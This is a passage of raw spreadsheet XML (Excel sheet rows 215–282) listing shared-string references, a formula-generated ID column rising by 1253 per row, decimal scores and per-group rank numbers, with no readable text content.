        <f t="shared" si="3"/>
        <v>9698330</v>
      </c>
      <c r="D215" t="s">
        <v>429</v>
      </c>
      <c r="E215">
        <v>3.2468292862176902E-2</v>
      </c>
      <c r="F215">
        <v>2</v>
      </c>
    </row>
    <row r="216" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A216" t="s">
        <v>430</v>
      </c>
      <c r="B216" t="s">
        <v>431</v>
      </c>
      <c r="C216">
        <f t="shared" si="3"/>
        <v>9699583</v>
      </c>
      <c r="D216" t="s">
        <v>432</v>
      </c>
      <c r="E216">
        <v>26.628582000732418</v>
      </c>
      <c r="F216">
        <v>1</v>
      </c>
    </row>
    <row r="217" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A217" t="s">
        <v>430</v>
      </c>
      <c r="B217" t="s">
        <v>431</v>
      </c>
      <c r="C217">
        <f t="shared" si="3"/>
        <v>9700836</v>
      </c>
      <c r="D217" t="s">
        <v>433</v>
      </c>
      <c r="E217">
        <v>4.4679160118103027</v>
      </c>
      <c r="F217">
        <v>2</v>
      </c>
    </row>
    <row r="218" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A218" t="s">
        <v>434</v>
      </c>
      <c r="B218" t="s">
        <v>435</v>
      </c>
      <c r="C218">
        <f t="shared" si="3"/>
        <v>9702089</v>
      </c>
      <c r="D218" t="s">
        <v>436</v>
      </c>
      <c r="E218">
        <v>29.53922271728516</v>
      </c>
      <c r="F218">
        <v>1</v>
      </c>
    </row>
    <row r="219" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A219" t="s">
        <v>434</v>
      </c>
      <c r="B219" t="s">
        <v>437</v>
      </c>
      <c r="C219">
        <f t="shared" si="3"/>
        <v>9703342</v>
      </c>
      <c r="D219" t="s">
        <v>438</v>
      </c>
      <c r="E219">
        <v>23.833969116210941</v>
      </c>
      <c r="F219">
        <v>2</v>
      </c>
    </row>
    <row r="220" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A220" t="s">
        <v>434</v>
      </c>
      <c r="B220" t="s">
        <v>435</v>
      </c>
      <c r="C220">
        <f t="shared" si="3"/>
        <v>9704595</v>
      </c>
      <c r="D220" t="s">
        <v>439</v>
      </c>
      <c r="E220">
        <v>7.5731596946716309</v>
      </c>
      <c r="F220">
        <v>3</v>
      </c>
    </row>
    <row r="221" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A221" t="s">
        <v>440</v>
      </c>
      <c r="B221" t="s">
        <v>441</v>
      </c>
      <c r="C221">
        <f t="shared" si="3"/>
        <v>9705848</v>
      </c>
      <c r="D221" t="s">
        <v>442</v>
      </c>
      <c r="E221">
        <v>33.668777465820313</v>
      </c>
      <c r="F221">
        <v>1</v>
      </c>
    </row>
    <row r="222" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A222" t="s">
        <v>440</v>
      </c>
      <c r="B222" t="s">
        <v>441</v>
      </c>
      <c r="C222">
        <f t="shared" si="3"/>
        <v>9707101</v>
      </c>
      <c r="D222" t="s">
        <v>443</v>
      </c>
      <c r="E222">
        <v>1.7698317766189579E-2</v>
      </c>
      <c r="F222">
        <v>2</v>
      </c>
    </row>
    <row r="223" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A223" t="s">
        <v>444</v>
      </c>
      <c r="B223" t="s">
        <v>445</v>
      </c>
      <c r="C223">
        <f t="shared" si="3"/>
        <v>9708354</v>
      </c>
      <c r="D223" t="s">
        <v>446</v>
      </c>
      <c r="E223">
        <v>29.867799758911129</v>
      </c>
      <c r="F223">
        <v>1</v>
      </c>
    </row>
    <row r="224" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A224" t="s">
        <v>444</v>
      </c>
      <c r="B224" t="s">
        <v>445</v>
      </c>
      <c r="C224">
        <f t="shared" si="3"/>
        <v>9709607</v>
      </c>
      <c r="D224" t="s">
        <v>447</v>
      </c>
      <c r="E224">
        <v>6.5332884788513184</v>
      </c>
      <c r="F224">
        <v>2</v>
      </c>
    </row>
    <row r="225" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A225" t="s">
        <v>448</v>
      </c>
      <c r="B225" t="s">
        <v>449</v>
      </c>
      <c r="C225">
        <f t="shared" si="3"/>
        <v>9710860</v>
      </c>
      <c r="D225" t="s">
        <v>450</v>
      </c>
      <c r="E225">
        <v>29.866279602050781</v>
      </c>
      <c r="F225">
        <v>1</v>
      </c>
    </row>
    <row r="226" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A226" t="s">
        <v>448</v>
      </c>
      <c r="B226" t="s">
        <v>449</v>
      </c>
      <c r="C226">
        <f t="shared" si="3"/>
        <v>9712113</v>
      </c>
      <c r="D226" t="s">
        <v>451</v>
      </c>
      <c r="E226">
        <v>3.0880379199516028E-5</v>
      </c>
      <c r="F226">
        <v>2</v>
      </c>
    </row>
    <row r="227" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A227" t="s">
        <v>452</v>
      </c>
      <c r="B227" t="s">
        <v>453</v>
      </c>
      <c r="C227">
        <f t="shared" si="3"/>
        <v>9713366</v>
      </c>
      <c r="D227" t="s">
        <v>454</v>
      </c>
      <c r="E227">
        <v>25.808187484741211</v>
      </c>
      <c r="F227">
        <v>1</v>
      </c>
    </row>
    <row r="228" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A228" t="s">
        <v>452</v>
      </c>
      <c r="B228" t="s">
        <v>453</v>
      </c>
      <c r="C228">
        <f t="shared" si="3"/>
        <v>9714619</v>
      </c>
      <c r="D228" t="s">
        <v>455</v>
      </c>
      <c r="E228">
        <v>3.3630983829498291</v>
      </c>
      <c r="F228">
        <v>2</v>
      </c>
    </row>
    <row r="229" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A229" t="s">
        <v>456</v>
      </c>
      <c r="B229" t="s">
        <v>457</v>
      </c>
      <c r="C229">
        <f t="shared" si="3"/>
        <v>9715872</v>
      </c>
      <c r="D229" t="s">
        <v>458</v>
      </c>
      <c r="E229">
        <v>24.427156448364261</v>
      </c>
      <c r="F229">
        <v>1</v>
      </c>
    </row>
    <row r="230" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A230" t="s">
        <v>456</v>
      </c>
      <c r="B230" t="s">
        <v>457</v>
      </c>
      <c r="C230">
        <f t="shared" si="3"/>
        <v>9717125</v>
      </c>
      <c r="D230" t="s">
        <v>459</v>
      </c>
      <c r="E230">
        <v>1.5144927501678469</v>
      </c>
      <c r="F230">
        <v>2</v>
      </c>
    </row>
    <row r="231" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A231" t="s">
        <v>460</v>
      </c>
      <c r="B231" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C231">
        <f t="shared" si="3"/>
        <v>9718378</v>
      </c>
      <c r="D231" t="s">
        <v>462</v>
      </c>
      <c r="E231">
        <v>37.774574279785163</v>
      </c>
      <c r="F231">
        <v>1</v>
      </c>
    </row>
    <row r="232" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A232" t="s">
        <v>460</v>
      </c>
      <c r="B232" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C232">
        <f t="shared" si="3"/>
        <v>9719631</v>
      </c>
      <c r="D232" t="s">
        <v>463</v>
      </c>
      <c r="E232">
        <v>25.315664291381839</v>
      </c>
      <c r="F232">
        <v>2</v>
      </c>
    </row>
    <row r="233" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A233" t="s">
        <v>460</v>
      </c>
      <c r="B233" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C233">
        <f t="shared" si="3"/>
        <v>9720884</v>
      </c>
      <c r="D233" t="s">
        <v>464</v>
      </c>
      <c r="E233">
        <v>24.972024917602539</v>
      </c>
      <c r="F233">
        <v>3</v>
      </c>
    </row>
    <row r="234" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A234" t="s">
        <v>460</v>
      </c>
      <c r="B234" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C234">
        <f t="shared" si="3"/>
        <v>9722137</v>
      </c>
      <c r="D234" t="s">
        <v>1438</v>
      </c>
      <c r="E234">
        <v>21.198617935180661</v>
      </c>
      <c r="F234">
        <v>4</v>
      </c>
    </row>
    <row r="235" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A235" t="s">
        <v>460</v>
      </c>
      <c r="B235" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C235">
        <f t="shared" si="3"/>
        <v>9723390</v>
      </c>
      <c r="D235" t="s">
        <v>3879</v>
      </c>
      <c r="E235">
        <v>11.86446571350098</v>
      </c>
      <c r="F235">
        <v>5</v>
      </c>
    </row>
    <row r="236" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A236" t="s">
        <v>460</v>
      </c>
      <c r="B236" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C236">
        <f t="shared" si="3"/>
        <v>9724643</v>
      </c>
      <c r="D236" t="s">
        <v>497</v>
      </c>
      <c r="E236">
        <v>11.822690010070801</v>
      </c>
      <c r="F236">
        <v>6</v>
      </c>
    </row>
    <row r="237" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A237" t="s">
        <v>460</v>
      </c>
      <c r="B237" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C237">
        <f t="shared" si="3"/>
        <v>9725896</v>
      </c>
      <c r="D237" t="s">
        <v>505</v>
      </c>
      <c r="E237">
        <v>10.530367851257321</v>
      </c>
      <c r="F237">
        <v>7</v>
      </c>
    </row>
    <row r="238" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A238" t="s">
        <v>460</v>
      </c>
      <c r="B238" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C238">
        <f t="shared" si="3"/>
        <v>9727149</v>
      </c>
      <c r="D238" t="s">
        <v>688</v>
      </c>
      <c r="E238">
        <v>8.0501899719238281</v>
      </c>
      <c r="F238">
        <v>8</v>
      </c>
    </row>
    <row r="239" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A239" t="s">
        <v>460</v>
      </c>
      <c r="B239" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C239">
        <f t="shared" si="3"/>
        <v>9728402</v>
      </c>
      <c r="D239" t="s">
        <v>712</v>
      </c>
      <c r="E239">
        <v>7.7692465782165527</v>
      </c>
      <c r="F239">
        <v>9</v>
      </c>
    </row>
    <row r="240" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A240" t="s">
        <v>460</v>
      </c>
      <c r="B240" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C240">
        <f t="shared" si="3"/>
        <v>9729655</v>
      </c>
      <c r="D240" t="s">
        <v>790</v>
      </c>
      <c r="E240">
        <v>6.109410285949707</v>
      </c>
      <c r="F240">
        <v>10</v>
      </c>
    </row>
    <row r="241" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A241" t="s">
        <v>460</v>
      </c>
      <c r="B241" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C241">
        <f t="shared" si="3"/>
        <v>9730908</v>
      </c>
      <c r="D241" t="s">
        <v>1153</v>
      </c>
      <c r="E241">
        <v>6.0862092971801758</v>
      </c>
      <c r="F241">
        <v>11</v>
      </c>
    </row>
    <row r="242" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A242" t="s">
        <v>460</v>
      </c>
      <c r="B242" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C242">
        <f t="shared" si="3"/>
        <v>9732161</v>
      </c>
      <c r="D242" t="s">
        <v>218</v>
      </c>
      <c r="E242">
        <v>4.4555916786193848</v>
      </c>
      <c r="F242">
        <v>12</v>
      </c>
    </row>
    <row r="243" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A243" t="s">
        <v>460</v>
      </c>
      <c r="B243" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C243">
        <f t="shared" si="3"/>
        <v>9733414</v>
      </c>
      <c r="D243" t="s">
        <v>1545</v>
      </c>
      <c r="E243">
        <v>2.7413642406463619</v>
      </c>
      <c r="F243">
        <v>13</v>
      </c>
    </row>
    <row r="244" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A244" t="s">
        <v>460</v>
      </c>
      <c r="B244" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C244">
        <f t="shared" si="3"/>
        <v>9734667</v>
      </c>
      <c r="D244" t="s">
        <v>924</v>
      </c>
      <c r="E244">
        <v>1.059022903442383</v>
      </c>
      <c r="F244">
        <v>14</v>
      </c>
    </row>
    <row r="245" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A245" t="s">
        <v>460</v>
      </c>
      <c r="B245" s="2" t="s">
        <v>461</v>
      </c>
      <c r="C245">
        <f t="shared" si="3"/>
        <v>9735920</v>
      </c>
      <c r="D245" t="s">
        <v>2147</v>
      </c>
      <c r="E245">
        <v>0.41409429907798773</v>
      </c>
      <c r="F245">
        <v>15</v>
      </c>
    </row>
    <row r="246" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A246" t="s">
        <v>476</v>
      </c>
      <c r="B246" t="s">
        <v>477</v>
      </c>
      <c r="C246">
        <f t="shared" si="3"/>
        <v>9737173</v>
      </c>
      <c r="D246" t="s">
        <v>478</v>
      </c>
      <c r="E246">
        <v>28.879817962646481</v>
      </c>
      <c r="F246">
        <v>1</v>
      </c>
    </row>
    <row r="247" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A247" t="s">
        <v>476</v>
      </c>
      <c r="B247" t="s">
        <v>477</v>
      </c>
      <c r="C247">
        <f t="shared" si="3"/>
        <v>9738426</v>
      </c>
      <c r="D247" t="s">
        <v>479</v>
      </c>
      <c r="E247">
        <v>10.37932014465332</v>
      </c>
      <c r="F247">
        <v>2</v>
      </c>
    </row>
    <row r="248" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A248" t="s">
        <v>480</v>
      </c>
      <c r="B248" t="s">
        <v>481</v>
      </c>
      <c r="C248">
        <f t="shared" si="3"/>
        <v>9739679</v>
      </c>
      <c r="D248" t="s">
        <v>482</v>
      </c>
      <c r="E248">
        <v>27.986675262451168</v>
      </c>
      <c r="F248">
        <v>1</v>
      </c>
    </row>
    <row r="249" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A249" t="s">
        <v>480</v>
      </c>
      <c r="B249" t="s">
        <v>481</v>
      </c>
      <c r="C249">
        <f t="shared" si="3"/>
        <v>9740932</v>
      </c>
      <c r="D249" t="s">
        <v>483</v>
      </c>
      <c r="E249">
        <v>16.742977142333981</v>
      </c>
      <c r="F249">
        <v>2</v>
      </c>
    </row>
    <row r="250" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A250" t="s">
        <v>484</v>
      </c>
      <c r="B250" t="s">
        <v>485</v>
      </c>
      <c r="C250">
        <f t="shared" si="3"/>
        <v>9742185</v>
      </c>
      <c r="D250" t="s">
        <v>486</v>
      </c>
      <c r="E250">
        <v>23.108827590942379</v>
      </c>
      <c r="F250">
        <v>1</v>
      </c>
    </row>
    <row r="251" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A251" t="s">
        <v>484</v>
      </c>
      <c r="B251" t="s">
        <v>485</v>
      </c>
      <c r="C251">
        <f t="shared" si="3"/>
        <v>9743438</v>
      </c>
      <c r="D251" t="s">
        <v>487</v>
      </c>
      <c r="E251">
        <v>20.61162185668945</v>
      </c>
      <c r="F251">
        <v>2</v>
      </c>
    </row>
    <row r="252" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A252" t="s">
        <v>484</v>
      </c>
      <c r="B252" t="s">
        <v>485</v>
      </c>
      <c r="C252">
        <f t="shared" si="3"/>
        <v>9744691</v>
      </c>
      <c r="D252" t="s">
        <v>488</v>
      </c>
      <c r="E252">
        <v>20.429218292236332</v>
      </c>
      <c r="F252">
        <v>3</v>
      </c>
    </row>
    <row r="253" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A253" t="s">
        <v>484</v>
      </c>
      <c r="B253" t="s">
        <v>485</v>
      </c>
      <c r="C253">
        <f t="shared" si="3"/>
        <v>9745944</v>
      </c>
      <c r="D253" t="s">
        <v>489</v>
      </c>
      <c r="E253">
        <v>19.038106918334961</v>
      </c>
      <c r="F253">
        <v>4</v>
      </c>
    </row>
    <row r="254" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A254" t="s">
        <v>484</v>
      </c>
      <c r="B254" t="s">
        <v>485</v>
      </c>
      <c r="C254">
        <f t="shared" si="3"/>
        <v>9747197</v>
      </c>
      <c r="D254" t="s">
        <v>490</v>
      </c>
      <c r="E254">
        <v>10.489273071289061</v>
      </c>
      <c r="F254">
        <v>5</v>
      </c>
    </row>
    <row r="255" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A255" t="s">
        <v>491</v>
      </c>
      <c r="B255" t="s">
        <v>492</v>
      </c>
      <c r="C255">
        <f t="shared" si="3"/>
        <v>9748450</v>
      </c>
      <c r="D255" t="s">
        <v>493</v>
      </c>
      <c r="E255">
        <v>39.653835296630859</v>
      </c>
      <c r="F255">
        <v>1</v>
      </c>
    </row>
    <row r="256" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A256" t="s">
        <v>491</v>
      </c>
      <c r="B256" t="s">
        <v>492</v>
      </c>
      <c r="C256">
        <f t="shared" si="3"/>
        <v>9749703</v>
      </c>
      <c r="D256" t="s">
        <v>494</v>
      </c>
      <c r="E256">
        <v>3.2011382579803471</v>
      </c>
      <c r="F256">
        <v>2</v>
      </c>
    </row>
    <row r="257" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A257" t="s">
        <v>495</v>
      </c>
      <c r="B257" t="s">
        <v>496</v>
      </c>
      <c r="C257">
        <f t="shared" si="3"/>
        <v>9750956</v>
      </c>
      <c r="D257" t="s">
        <v>497</v>
      </c>
      <c r="E257">
        <v>34.576019287109382</v>
      </c>
      <c r="F257">
        <v>1</v>
      </c>
    </row>
    <row r="258" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A258" t="s">
        <v>495</v>
      </c>
      <c r="B258" t="s">
        <v>496</v>
      </c>
      <c r="C258">
        <f t="shared" si="3"/>
        <v>9752209</v>
      </c>
      <c r="D258" t="s">
        <v>498</v>
      </c>
      <c r="E258">
        <v>6.0738124847412109</v>
      </c>
      <c r="F258">
        <v>2</v>
      </c>
    </row>
    <row r="259" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A259" t="s">
        <v>499</v>
      </c>
      <c r="B259" t="s">
        <v>500</v>
      </c>
      <c r="C259">
        <f t="shared" si="3"/>
        <v>9753462</v>
      </c>
      <c r="D259" t="s">
        <v>501</v>
      </c>
      <c r="E259">
        <v>23.64348220825195</v>
      </c>
      <c r="F259">
        <v>1</v>
      </c>
    </row>
    <row r="260" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A260" t="s">
        <v>499</v>
      </c>
      <c r="B260" t="s">
        <v>500</v>
      </c>
      <c r="C260">
        <f t="shared" si="3"/>
        <v>9754715</v>
      </c>
      <c r="D260" t="s">
        <v>502</v>
      </c>
      <c r="E260">
        <v>6.5071873664855957</v>
      </c>
      <c r="F260">
        <v>2</v>
      </c>
    </row>
    <row r="261" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A261" t="s">
        <v>503</v>
      </c>
      <c r="B261" t="s">
        <v>504</v>
      </c>
      <c r="C261">
        <f t="shared" si="3"/>
        <v>9755968</v>
      </c>
      <c r="D261" t="s">
        <v>505</v>
      </c>
      <c r="E261">
        <v>29.260507583618161</v>
      </c>
      <c r="F261">
        <v>1</v>
      </c>
    </row>
    <row r="262" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A262" t="s">
        <v>503</v>
      </c>
      <c r="B262" t="s">
        <v>504</v>
      </c>
      <c r="C262">
        <f t="shared" si="3"/>
        <v>9757221</v>
      </c>
      <c r="D262" t="s">
        <v>506</v>
      </c>
      <c r="E262">
        <v>6.2491321004927158E-3</v>
      </c>
      <c r="F262">
        <v>2</v>
      </c>
    </row>
    <row r="263" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A263" t="s">
        <v>507</v>
      </c>
      <c r="B263" t="s">
        <v>508</v>
      </c>
      <c r="C263">
        <f t="shared" si="3"/>
        <v>9758474</v>
      </c>
      <c r="D263" t="s">
        <v>509</v>
      </c>
      <c r="E263">
        <v>36.346237182617188</v>
      </c>
      <c r="F263">
        <v>1</v>
      </c>
    </row>
    <row r="264" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A264" t="s">
        <v>507</v>
      </c>
      <c r="B264" t="s">
        <v>508</v>
      </c>
      <c r="C264">
        <f t="shared" si="3"/>
        <v>9759727</v>
      </c>
      <c r="D264" t="s">
        <v>510</v>
      </c>
      <c r="E264">
        <v>4.2013816833496094</v>
      </c>
      <c r="F264">
        <v>2</v>
      </c>
    </row>
    <row r="265" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A265" t="s">
        <v>511</v>
      </c>
      <c r="B265" t="s">
        <v>512</v>
      </c>
      <c r="C265">
        <f t="shared" si="3"/>
        <v>9760980</v>
      </c>
      <c r="D265" t="s">
        <v>513</v>
      </c>
      <c r="E265">
        <v>34.207584381103523</v>
      </c>
      <c r="F265">
        <v>1</v>
      </c>
    </row>
    <row r="266" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A266" t="s">
        <v>511</v>
      </c>
      <c r="B266" t="s">
        <v>512</v>
      </c>
      <c r="C266">
        <f t="shared" ref="C266:C329" si="4">C265+1253</f>
        <v>9762233</v>
      </c>
      <c r="D266" t="s">
        <v>514</v>
      </c>
      <c r="E266">
        <v>25.50070953369141</v>
      </c>
      <c r="F266">
        <v>2</v>
      </c>
    </row>
    <row r="267" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A267" t="s">
        <v>511</v>
      </c>
      <c r="B267" t="s">
        <v>512</v>
      </c>
      <c r="C267">
        <f t="shared" si="4"/>
        <v>9763486</v>
      </c>
      <c r="D267" t="s">
        <v>515</v>
      </c>
      <c r="E267">
        <v>9.3349924087524414</v>
      </c>
      <c r="F267">
        <v>3</v>
      </c>
    </row>
    <row r="268" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A268" t="s">
        <v>516</v>
      </c>
      <c r="B268" t="s">
        <v>517</v>
      </c>
      <c r="C268">
        <f t="shared" si="4"/>
        <v>9764739</v>
      </c>
      <c r="D268" t="s">
        <v>518</v>
      </c>
      <c r="E268">
        <v>22.55794715881348</v>
      </c>
      <c r="F268">
        <v>1</v>
      </c>
    </row>
    <row r="269" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A269" t="s">
        <v>516</v>
      </c>
      <c r="B269" t="s">
        <v>517</v>
      </c>
      <c r="C269">
        <f t="shared" si="4"/>
        <v>9765992</v>
      </c>
      <c r="D269" t="s">
        <v>519</v>
      </c>
      <c r="E269">
        <v>15.40075016021729</v>
      </c>
      <c r="F269">
        <v>2</v>
      </c>
    </row>
    <row r="270" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A270" t="s">
        <v>520</v>
      </c>
      <c r="B270" t="s">
        <v>521</v>
      </c>
      <c r="C270">
        <f t="shared" si="4"/>
        <v>9767245</v>
      </c>
      <c r="D270" t="s">
        <v>522</v>
      </c>
      <c r="E270">
        <v>34.259941101074219</v>
      </c>
      <c r="F270">
        <v>1</v>
      </c>
    </row>
    <row r="271" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A271" t="s">
        <v>520</v>
      </c>
      <c r="B271" t="s">
        <v>521</v>
      </c>
      <c r="C271">
        <f t="shared" si="4"/>
        <v>9768498</v>
      </c>
      <c r="D271" t="s">
        <v>523</v>
      </c>
      <c r="E271">
        <v>7.2858715611801017E-6</v>
      </c>
      <c r="F271">
        <v>2</v>
      </c>
    </row>
    <row r="272" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A272" t="s">
        <v>524</v>
      </c>
      <c r="B272" t="s">
        <v>525</v>
      </c>
      <c r="C272">
        <f t="shared" si="4"/>
        <v>9769751</v>
      </c>
      <c r="D272" t="s">
        <v>526</v>
      </c>
      <c r="E272">
        <v>30.208917617797852</v>
      </c>
      <c r="F272">
        <v>1</v>
      </c>
    </row>
    <row r="273" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A273" t="s">
        <v>524</v>
      </c>
      <c r="B273" t="s">
        <v>525</v>
      </c>
      <c r="C273">
        <f t="shared" si="4"/>
        <v>9771004</v>
      </c>
      <c r="D273" t="s">
        <v>527</v>
      </c>
      <c r="E273">
        <v>7.7902917861938477</v>
      </c>
      <c r="F273">
        <v>2</v>
      </c>
    </row>
    <row r="274" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A274" t="s">
        <v>528</v>
      </c>
      <c r="B274" t="s">
        <v>529</v>
      </c>
      <c r="C274">
        <f t="shared" si="4"/>
        <v>9772257</v>
      </c>
      <c r="D274" t="s">
        <v>530</v>
      </c>
      <c r="E274">
        <v>26.11937141418457</v>
      </c>
      <c r="F274">
        <v>1</v>
      </c>
    </row>
    <row r="275" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A275" t="s">
        <v>528</v>
      </c>
      <c r="B275" t="s">
        <v>529</v>
      </c>
      <c r="C275">
        <f t="shared" si="4"/>
        <v>9773510</v>
      </c>
      <c r="D275" t="s">
        <v>531</v>
      </c>
      <c r="E275">
        <v>7.2912821769714364</v>
      </c>
      <c r="F275">
        <v>2</v>
      </c>
    </row>
    <row r="276" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A276" t="s">
        <v>532</v>
      </c>
      <c r="B276" t="s">
        <v>533</v>
      </c>
      <c r="C276">
        <f t="shared" si="4"/>
        <v>9774763</v>
      </c>
      <c r="D276" t="s">
        <v>534</v>
      </c>
      <c r="E276">
        <v>23.832168579101559</v>
      </c>
      <c r="F276">
        <v>1</v>
      </c>
    </row>
    <row r="277" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A277" t="s">
        <v>532</v>
      </c>
      <c r="B277" t="s">
        <v>533</v>
      </c>
      <c r="C277">
        <f t="shared" si="4"/>
        <v>9776016</v>
      </c>
      <c r="D277" t="s">
        <v>535</v>
      </c>
      <c r="E277">
        <v>4.7996697425842294</v>
      </c>
      <c r="F277">
        <v>2</v>
      </c>
    </row>
    <row r="278" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A278" t="s">
        <v>536</v>
      </c>
      <c r="B278" t="s">
        <v>537</v>
      </c>
      <c r="C278">
        <f t="shared" si="4"/>
        <v>9777269</v>
      </c>
      <c r="D278" t="s">
        <v>538</v>
      </c>
      <c r="E278">
        <v>31.77507400512695</v>
      </c>
      <c r="F278">
        <v>1</v>
      </c>
    </row>
    <row r="279" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A279" t="s">
        <v>536</v>
      </c>
      <c r="B279" t="s">
        <v>537</v>
      </c>
      <c r="C279">
        <f t="shared" si="4"/>
        <v>9778522</v>
      </c>
      <c r="D279" t="s">
        <v>539</v>
      </c>
      <c r="E279">
        <v>5.6346311569213867</v>
      </c>
      <c r="F279">
        <v>2</v>
      </c>
    </row>
    <row r="280" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A280" t="s">
        <v>540</v>
      </c>
      <c r="B280" t="s">
        <v>541</v>
      </c>
      <c r="C280">
        <f t="shared" si="4"/>
        <v>9779775</v>
      </c>
      <c r="D280" t="s">
        <v>542</v>
      </c>
      <c r="E280">
        <v>25.416023254394531</v>
      </c>
      <c r="F280">
        <v>1</v>
      </c>
    </row>
    <row r="281" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A281" t="s">
        <v>540</v>
      </c>
      <c r="B281" t="s">
        <v>541</v>
      </c>
      <c r="C281">
        <f t="shared" si="4"/>
        <v>9781028</v>
      </c>
      <c r="D281" t="s">
        <v>543</v>
      </c>
      <c r="E281">
        <v>8.7093257904052734</v>
      </c>
      <c r="F281">
        <v>2</v>
      </c>
    </row>
    <row r="282" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A282" t="s">
        <v>544</v>
      </c>
      <c r="B282" t="s">
        <v>545</v>
      </c>
      <c r="C282">
        <f t="shared" si="4"/>
        <v>9782281</v>
      </c>
      <c r="D282" t="s">
        <v>546</v>
      </c>
      <c r="E282">
        <v>30.372207641601559</v>
      </c>
      <c r="F282">
        <v>1</v>
      </c>
    </row>
